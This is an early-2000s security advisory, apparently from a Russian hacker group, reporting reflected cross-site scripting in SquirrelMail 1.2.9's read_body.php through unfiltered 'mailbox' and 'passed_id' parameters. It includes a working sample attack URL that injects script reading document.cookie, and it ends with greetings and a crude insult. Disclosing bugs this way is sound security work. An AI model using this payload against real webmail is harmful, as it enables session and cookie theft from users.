=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::= topic: SquirrelMail v1.2.9 XSS bugs product: SquirrelMail v1.2.9 vendor: www.squirrelmail.org risk: low date: 12/3/2k2 discovered by: euronymous /F0KP /HACKRU Team advisory url: http://f0kp.iplus.ru/bz/008.txt =:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::= description ----------- when reading some email you can to insert the scripting code.. read_body.php dont make filtering users input in `mailbox' and `passed_id' variables. btw, today has released v1.2.10. im dont know if this version contains this xss. sample attack ------------- http://hostname/src/read_body.php?mailbox= %3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&passed_id= %3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E& startMessage=1&show_more=0 [it must be in a single string] not URL-encoded string working fine also. shouts: HACKRU Team, DWC, DHG, Spoofed Packet, all russian security guyz!! fuck_off: slavomira and other dirty ppl in *.kz ================ im not a lame, not yet a hacker ================
